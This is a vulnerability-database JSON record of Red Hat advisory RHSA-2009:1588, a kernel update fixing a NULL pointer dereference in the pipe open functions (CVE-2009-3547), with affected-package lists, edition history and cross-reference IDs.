{"id": "RHSA-2009:1588", "hash": "51d9a5ea863d6b743ee2a84fc83e8dfa", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2009:1588) Important: kernel security update", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.", "published": "2009-11-17T05:00:00", "modified": "2017-09-08T12:16:03", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://access.redhat.com/errata/RHSA-2009:1588", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2009-3547"], "lastseen": "2019-08-13T18:46:00", "history": [{"bulletin": {"id": "RHSA-2009:1588", "hash": "", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2009:1588) Important: kernel security update", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.", "published": "2009-11-17T05:00:00", "modified": "2015-04-24T14:21:25", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1588", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2009-3547"], "lastseen": "2016-09-04T11:18:02", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "affectedPackage": [{"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-smp-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt", "packageName": "kernel-smp", "OSVersion": "any", "OS": "RedHat", "arch": "i686"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-smp-devel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt", "packageName": "kernel-smp-devel", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt", "packageName": "kernel", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.s390.rpm", "operator": "lt", "packageName": "kernel-devel", "OSVersion": "any", "OS": "RedHat", "arch": "s390"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-devel-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt", "packageName": "kernel-largesmp-devel", "OSVersion": "any", "OS": "RedHat", "arch": "ia64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-devel-2.6.9-78.0.28.EL.ppc64.rpm", "operator": "lt", "packageName": "kernel-largesmp-devel", "OSVersion": "any", "OS": "RedHat", "arch": "ppc64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-doc-2.6.9-78.0.28.EL.noarch.rpm", "operator": "lt", "packageName": "kernel-doc", "OSVersion": "any", "OS": "RedHat", "arch": "noarch"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-smp-devel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt", "packageName": "kernel-smp-devel", "OSVersion": "any", "OS": "RedHat", "arch": "i686"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.ppc64.rpm", "operator": "lt", "packageName": "kernel-devel", "OSVersion": "any", "OS": "RedHat", "arch": "ppc64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt", "packageName": "kernel", "OSVersion": "any", "OS": "RedHat", "arch": "i686"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt", "packageName": "kernel-largesmp", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-smp-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt", "packageName": "kernel-smp", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-xenU-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt", "packageName": "kernel-xenU", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-hugemem-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt", "packageName": "kernel-hugemem", "OSVersion": "any", "OS": "RedHat", "arch": "i686"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.src.rpm", "operator": "lt", "packageName": "kernel", "OSVersion": "any", "OS": "RedHat", "arch": "src"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt", "packageName": "kernel-largesmp", "OSVersion": "any", "OS": "RedHat", "arch": "ia64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-xenU-devel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt", "packageName": "kernel-xenU-devel", "OSVersion": "any", "OS": "RedHat", "arch": "i686"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt", "packageName": "kernel-devel", "OSVersion": "any", "OS": "RedHat", "arch": "ia64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-xenU-devel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt", "packageName": "kernel-xenU-devel", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.ppc64.rpm", "operator": "lt", "packageName": "kernel", "OSVersion": "any", "OS": "RedHat", "arch": "ppc64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt", "packageName": "kernel-devel", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.ppc64iseries.rpm", "operator": "lt", "packageName": "kernel-devel", "OSVersion": "any", "OS": "RedHat", "arch": "ppc64iseries"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.ppc64iseries.rpm", "operator": "lt", "packageName": "kernel", "OSVersion": "any", "OS": "RedHat", "arch": "ppc64iseries"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-hugemem-devel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt", "packageName": "kernel-hugemem-devel", "OSVersion": "any", "OS": "RedHat", "arch": "i686"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-devel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt", "packageName": "kernel-largesmp-devel", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.s390x.rpm", "operator": "lt", "packageName": "kernel-devel", "OSVersion": "any", "OS": "RedHat", "arch": "s390x"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt", "packageName": "kernel-devel", "OSVersion": "any", "OS": "RedHat", "arch": "i686"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt", "packageName": "kernel", "OSVersion": "any", "OS": "RedHat", "arch": "ia64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-xenU-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt", "packageName": "kernel-xenU", "OSVersion": "any", "OS": "RedHat", "arch": "i686"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.ppc64.rpm", "operator": "lt", "packageName": "kernel-largesmp", "OSVersion": "any", "OS": "RedHat", "arch": "ppc64"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.s390.rpm", "operator": "lt", "packageName": "kernel", "OSVersion": "any", "OS": "RedHat", "arch": "s390"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.s390x.rpm", "operator": "lt", "packageName": "kernel", "OSVersion": "any", "OS": "RedHat", "arch": "s390x"}]}, "lastseen": "2016-09-04T11:18:02", "differentElements": ["affectedPackage", "modified"], "edition": 1}, {"bulletin": {"id": "RHSA-2009:1588", "hash": "", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2009:1588) Important: kernel security update", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.", "published": "2009-11-17T05:00:00", "modified": "2017-07-28T04:53:08", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1588", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2009-3547"], "lastseen": "2017-07-29T00:57:21", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "affectedPackage": [{"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-xenU-devel", "packageFilename": "kernel-xenU-devel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-smp", "packageFilename": "kernel-smp-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-hugemem", "packageFilename": "kernel-hugemem-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-smp-devel", "packageFilename": "kernel-smp-devel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-xenU", "packageFilename": "kernel-xenU-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-hugemem-devel", "packageFilename": "kernel-hugemem-devel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.9-78.0.28.EL.noarch.rpm", "arch": "noarch", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel", "packageFilename": "kernel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}]}, "lastseen": "2017-07-29T00:57:21", "differentElements": ["affectedPackage", "modified"], "edition": 2}, {"bulletin": {"id": "RHSA-2009:1588", "hash": "a8a778485d2f1fd6a6e8f7f7011e395f", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2009:1588) Important: kernel security update", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.", "published": "2009-11-17T05:00:00", "modified": "2017-09-08T12:16:03", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1588", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2009-3547"], "lastseen": "2017-09-09T07:20:21", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "objectVersion": "1.4", "affectedPackage": [{"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-largesmp", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.ia64.rpm", "arch": "ia64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.ia64.rpm", "arch": "ia64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel", "packageFilename": "kernel-2.6.9-78.0.28.EL.ia64.rpm", "arch": "ia64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.9-78.0.28.EL.noarch.rpm", "arch": "noarch", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-largesmp-devel", "packageFilename": "kernel-largesmp-devel-2.6.9-78.0.28.EL.ia64.rpm", "arch": "ia64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel", "packageFilename": "kernel-2.6.9-78.0.28.EL.src.rpm", "arch": "src", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-largesmp", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-smp", "packageFilename": "kernel-smp-2.6.9-78.0.28.EL.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-largesmp-devel", "packageFilename": "kernel-largesmp-devel-2.6.9-78.0.28.EL.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-smp-devel", "packageFilename": "kernel-smp-devel-2.6.9-78.0.28.EL.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-xenU", "packageFilename": "kernel-xenU-2.6.9-78.0.28.EL.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel", "packageFilename": "kernel-2.6.9-78.0.28.EL.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-xenU-devel", "packageFilename": "kernel-xenU-devel-2.6.9-78.0.28.EL.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-xenU-devel", "packageFilename": "kernel-xenU-devel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-smp", "packageFilename": "kernel-smp-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-hugemem", "packageFilename": "kernel-hugemem-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-smp-devel", "packageFilename": "kernel-smp-devel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-xenU", "packageFilename": "kernel-xenU-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-hugemem-devel", "packageFilename": "kernel-hugemem-devel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel", "packageFilename": "kernel-2.6.9-78.0.28.EL.i686.rpm", "arch": "i686", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-largesmp", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.ppc64.rpm", "arch": "ppc64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel", "packageFilename": "kernel-2.6.9-78.0.28.EL.ppc64iseries.rpm", "arch": "ppc64iseries", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel", "packageFilename": "kernel-2.6.9-78.0.28.EL.ppc64.rpm", "arch": "ppc64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-largesmp-devel", "packageFilename": "kernel-largesmp-devel-2.6.9-78.0.28.EL.ppc64.rpm", "arch": "ppc64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.ppc64iseries.rpm", "arch": "ppc64iseries", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.ppc64.rpm", "arch": "ppc64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.s390.rpm", "arch": "s390", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel", "packageFilename": "kernel-2.6.9-78.0.28.EL.s390.rpm", "arch": "s390", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel", "packageFilename": "kernel-2.6.9-78.0.28.EL.s390x.rpm", "arch": "s390x", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.6.9-78.0.28.EL", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.s390x.rpm", "arch": "s390x", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}]}, "lastseen": "2017-09-09T07:20:21", "differentElements": ["affectedPackage"], "edition": 3}, {"bulletin": {"id": "RHSA-2009:1588", "hash": "8bbdebd1e44491bb91d31431f8393b07", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2009:1588) Important: kernel security update", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.", "published": "2009-11-17T05:00:00", "modified": "2017-09-08T12:16:03", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1588", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2009-3547"], "lastseen": "2018-12-11T17:46:00", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3547"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2009-1588.NASL", "SL_20091103_KERNEL_ON_SL4_X.NASL", "REDHAT-RHSA-2009-1672.NASL", "REDHAT-RHSA-2009-1587.NASL", "FEDORA_2009-11038.NASL", "FEDORA_2009-11032.NASL", "SL_20091103_KERNEL_ON_SL5_X.NASL", "ORACLEVM_OVMSA-2009-0033.NASL", "SUSE9_12541.NASL", "SUSE_11_1_KERNEL-091123.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231066218", "OPENVAS:136141256231066175", "OPENVAS:66218", "OPENVAS:66175", "OPENVAS:1361412562310880808", "OPENVAS:880808", "OPENVAS:136141256231066176", "OPENVAS:1361412562310880731", "OPENVAS:66176", "OPENVAS:66219"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1541", "ELSA-2009-1548", "ELSA-2009-1550"]}, {"type": "exploitdb", "idList": ["EDB-ID:33322", "EDB-ID:40812", "EDB-ID:10018", "EDB-ID:33321", "EDB-ID:9844"]}, {"type": "seebug", "idList": ["SSV:12576", "SSV:12593"]}, {"type": "redhat", "idList": ["RHSA-2009:1541", "RHSA-2009:1587", "RHSA-2009:1672", "RHSA-2009:1548", "RHSA-2009:1550", "RHSA-2009:1540"]}, {"type": "threatpost", "idList": ["THREATPOST:9B247D64D74F86C01215CC8DF7D85698"]}, {"type": "centos", "idList": ["CESA-2009:1541", "CESA-2009:1548", "CESA-2009:1550"]}, {"type": "zdt", "idList": ["1337DAY-ID-26409"]}, {"type": "canvas", "idList": ["FS_PIPE_RACE_TO_NULL"]}, {"type": "suse", "idList": ["SUSE-SA:2009:055", "SUSE-SA:2009:060", "SUSE-SA:2009:056", "SUSE-SA:2009:054"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1927-1:8E712", "DEBIAN:DSA-1929-1:8AEEF"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22752", "SECURITYVULNS:DOC:28783"]}, {"type": "vmware", "idList": ["VMSA-2010-0010"]}], "modified": "2018-12-11T17:46:00"}}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "kernel-largesmp", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt"}]}, "lastseen": "2018-12-11T17:46:00", "differentElements": ["cvss"], "edition": 4}, {"bulletin": {"id": "RHSA-2009:1588", "hash": "d84a4578ce91fd2a9f1be1d43ace39f5", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2009:1588) Important: kernel security update", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.", "published": "2009-11-17T05:00:00", "modified": "2017-09-08T12:16:03", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://access.redhat.com/errata/RHSA-2009:1588", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2009-3547"], "lastseen": "2019-05-29T14:34:02", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2019-05-29T14:34:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3547"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2009-1588.NASL", "SL_20091103_KERNEL_ON_SL4_X.NASL", "REDHAT-RHSA-2009-1672.NASL", "REDHAT-RHSA-2009-1587.NASL", "FEDORA_2009-11032.NASL", "FEDORA_2009-11038.NASL", "SL_20091103_KERNEL_ON_SL5_X.NASL", "ORACLEVM_OVMSA-2009-0033.NASL", "SUSE9_12541.NASL", "SUSE_11_1_KERNEL-091123.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231066218", "OPENVAS:136141256231066175", "OPENVAS:1361412562310880808", "OPENVAS:66218", "OPENVAS:66175", "OPENVAS:880808", "OPENVAS:136141256231066176", "OPENVAS:1361412562310880731", "OPENVAS:66176", "OPENVAS:1361412562310122422"]}, {"type": "seebug", "idList": ["SSV:12576", "SSV:12593"]}, {"type": "exploitdb", "idList": ["EDB-ID:33322", "EDB-ID:40812", "EDB-ID:33321", "EDB-ID:9844", "EDB-ID:10018"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1541", "ELSA-2009-1548", "ELSA-2009-1550"]}, {"type": "threatpost", "idList": ["THREATPOST:9B247D64D74F86C01215CC8DF7D85698"]}, {"type": "redhat", "idList": ["RHSA-2009:1541", "RHSA-2009:1672", "RHSA-2009:1587", "RHSA-2009:1548", "RHSA-2009:1550", "RHSA-2009:1540"]}, {"type": "centos", "idList": ["CESA-2009:1541", "CESA-2009:1548", "CESA-2009:1550"]}, {"type": "zdt", "idList": ["1337DAY-ID-26409"]}, {"type": "canvas", "idList": ["FS_PIPE_RACE_TO_NULL"]}, {"type": "suse", "idList": ["SUSE-SA:2009:055", "SUSE-SA:2009:060", "SUSE-SA:2009:056", "SUSE-SA:2009:054"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1927-1:8E712", "DEBIAN:DSA-1929-1:8AEEF"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22752"]}, {"type": "vmware", "idList": ["VMSA-2010-0010"]}], "modified": "2019-05-29T14:34:02"}}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "kernel-largesmp", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt"}]}, "lastseen": "2019-05-29T14:34:02", "differentElements": ["affectedPackage"], "edition": 5}], "viewCount": 2, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2019-08-13T18:46:00"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3547"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231066175", "OPENVAS:136141256231066218", "OPENVAS:66175", "OPENVAS:66218", "OPENVAS:1361412562310880808", "OPENVAS:880808", "OPENVAS:66176", "OPENVAS:1361412562310880731", "OPENVAS:136141256231066176", "OPENVAS:136141256231066219"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2009-1588.NASL", "SL_20091103_KERNEL_ON_SL4_X.NASL", "REDHAT-RHSA-2009-1672.NASL", "REDHAT-RHSA-2009-1587.NASL", "FEDORA_2009-11032.NASL", "FEDORA_2009-11038.NASL", "SL_20091103_KERNEL_ON_SL5_X.NASL", 